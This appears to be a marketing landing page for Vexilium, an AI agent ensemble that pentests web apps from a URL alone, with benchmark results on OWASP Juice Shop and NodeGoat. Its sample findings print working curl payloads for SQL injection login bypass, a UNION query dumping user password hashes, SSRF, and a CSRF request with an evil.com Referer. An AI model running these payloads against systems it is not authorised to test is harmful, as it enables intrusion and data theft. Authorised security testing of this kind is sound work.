Autonomous red-team ensemble · v0.4 preview

Pentest any web app.
No source code.
No configuration.
Just a URL.

Vexilium is a black-box AI pentester. Point it at any web app or API, and an ensemble of two engines (a deep single-session agent and a parallel red team) returns verified exploits. Every finding ships with a runnable curl. Source code never leaves your perimeter, because it's never touched.

No spam. We email once when your slot opens.

$ python -m agent.main --ensemble --target https://your-app.com
↳ ~10 minutes later
$ cat report.md
→ 11 verified exploits, 11 curl reproducers, 1 executive summary
87 seconds · live capture

One URL.
Eleven verified exploits.

Real run, sped 10×. Captions are diegetic: the agent's own reasoning, payloads, and verifier outcomes. Nothing is cherry-picked or replayed. This capture is the deep single-engine run; the full ensemble adds a parallel red team for the numbers below.

Headline numbers
19
unique verified exploits across two web stacks, ensemble of two engines
Juice Shop 11 · NodeGoat 8
~10min
average runtime, fully autonomous, no human input
deep agent + red team
0
lines of source code accessed. Pure black-box.
vs. Shannon · vs. XBOW

Where the coverage comes from

OWASP Juice Shop
11 unique verified
deep agent 8 · red team 4 · found by both 1
OWASP NodeGoat
8 unique verified
deep agent 6 · red team 5 · found by both 3

Neither engine alone finds the full set. The deep agent's persistent session catches stateful, chained bugs (server-side JS injection → RCE), while the red team's parallel specialists catch breadth (SSRF, NoSQL injection, broken access control on endpoints the deep agent never reached). The ensemble reports their deduplicated union.

Same target. Same conditions. No human config.

Tool Target Runtime Verified active exploits
Vexilium · ensemble OWASP Juice Shop ~10 min · two engines 11
Vexilium · ensemble OWASP NodeGoat ~10 min · two engines 8
OWASP ZAP baseline Juice Shop ~5 min 0 (10 passive)
Nuclei v3.8 · 6,618 templates Juice Shop 7m 32s 0 (1 passive)

Industry-standard scanners (same network, same machine, default config) found zero active exploits. Across 14,000+ requests and 6,618 templates, Nuclei matched a single passive metrics endpoint. Vexilium's ensemble landed 19 working exploits across two unrelated web stacks, spanning auth bypass, SQLi, SSRF, NoSQL injection, IDOR, CSRF, and server-side JS injection → RCE.

How it works · ensemble

Two engines. One verified union.

Recon and auth run once and share a session. Then two engines attack the same surface from different angles, one for depth, one for breadth, and a critic plus a deterministic verifier merge what survives into a single deduplicated report.

01 / RECON + AUTH

Map once. Log in once.

A recon agent fingerprints the framework and enumerates the API surface; an auth agent establishes one session and shares it on a blackboard. Every request is scope-locked to the target's host:port at the tool layer.

GET /api/Products
POST /rest/user/login (session shared)
scope locked: host:port
02 / TWO ENGINES

Depth and breadth, in parallel.

A single deep-session agent chains multi-step attacks down one path; a red team of specialists sweeps the surface in parallel. Different angles, same target: the union is larger than either alone.

deep agent → SSJI → RCE /contributions
red team → SSRF, NoSQL, broken-access ×N
↳ low overlap, wide coverage
03 / MERGE + VERIFY

Prove it. Then dedupe.

A critic adversarially challenges every candidate; a per-class verifier rejects anything without observable exploit evidence. Survivors merge into one report, tagged by which engine found each.

VERIFIED sqli /rest/user/login [deep]
VERIFIED ssrf /research [red team]
↳ merged · 11 unique · 1 found by both

The moat is the data. Every customer run logs (target_fingerprint, payload, verifier_outcome). Binary signal, not noisy chat traces. That dataset trains specialist 7B–32B models that beat frontier on cost and latency for this narrow task. Open-source tools can replicate the agent; they cannot replicate the dataset.

The attack surface

Every endpoint is a pixel.
Two engines map the whole sphere.

Hover to disturb the surface. The deep agent drills one path to the core; the red team sweeps the perimeter in parallel. Together they leave no facet untested.

Sample of last run

Verified findings.
Working curl reproducers, every time.

SQLi · auth bypass Juice Shop · turn 6

Admin login bypassed with one string

' OR 1=1-- on /rest/user/login returns a valid admin JWT. Role admin, full access.

$ curl -X POST localhost:3000/rest/user/login \
  -H 'Content-Type: application/json' \
  -d '{"email":"' OR 1=1--","password":"x"}'
↳ {"authentication":{"token":"eyJ0eXA..."}}
UNION SQLi · data exfil Juice Shop · turn 13

Every user's password hash, exfiltrated

UNION SELECT on /rest/products/search leaks the full Users table: emails, MD5 hashes, roles for all 23 accounts.

$ curl "localhost:3000/rest/products/search?q=apple')) UNION SELECT id,email,password,role,4,5,6,7,8,9 FROM Users--"
↳ 23 rows · admin@juice-sh.op · 0192023a7bbd...
SSRF · internal proxy NodeGoat · turn 18

Server fetches arbitrary URLs on demand

/research?url= proxies any URL through the server. Internal recon, data exfil via internal endpoints, full blind-SSRF surface.

$ curl "localhost:4000/research?url=http://localhost:4000/dashboard"
↳ <internal dashboard HTML returned>
CSRF · state change NodeGoat · turn 15

Cross-origin POST modifies retirement allocations

/contributions accepts forged POSTs with attacker Referer and no CSRF token. The agent quoted the commented-out fix from the page source as evidence.

$ curl -X POST localhost:4000/contributions \
  -H 'Referer: http://evil.com/csrf.html' \
  -d 'preTax=99&roth=0&afterTax=0'
↳ HTTP 200 · "Contributions updated successfully."
Why black-box

Source-code AI pentesters serve the easy half of the market.
We serve the rest.

vs. Shannon (white-box)

Requires source-code ingestion. Excludes external pentest, vendor-risk review, bug-bounty research, and every regulated buyer that can't ship source to a US AI vendor.

vs. XBOW (enterprise findings)

Enterprise SaaS sells reports to security teams. We ship verified exploits with curl reproducers into developer workflow: PR-integrated, per-commit, continuous.

vs. ZAP / Nuclei (static)

Template-based scanners find missing headers and metrics endpoints. They cannot bypass auth, exfiltrate data, or chain attacks. We consistently do all three.

Join the waitlist

Get early access.
Be first in line when Vexilium opens.

We're rolling out to a small set of design partners first. Join the waitlist and we'll reach out before public launch, usually with a personal walkthrough scheduled to your stack.

// We respond within 48 hours. No spam, ever.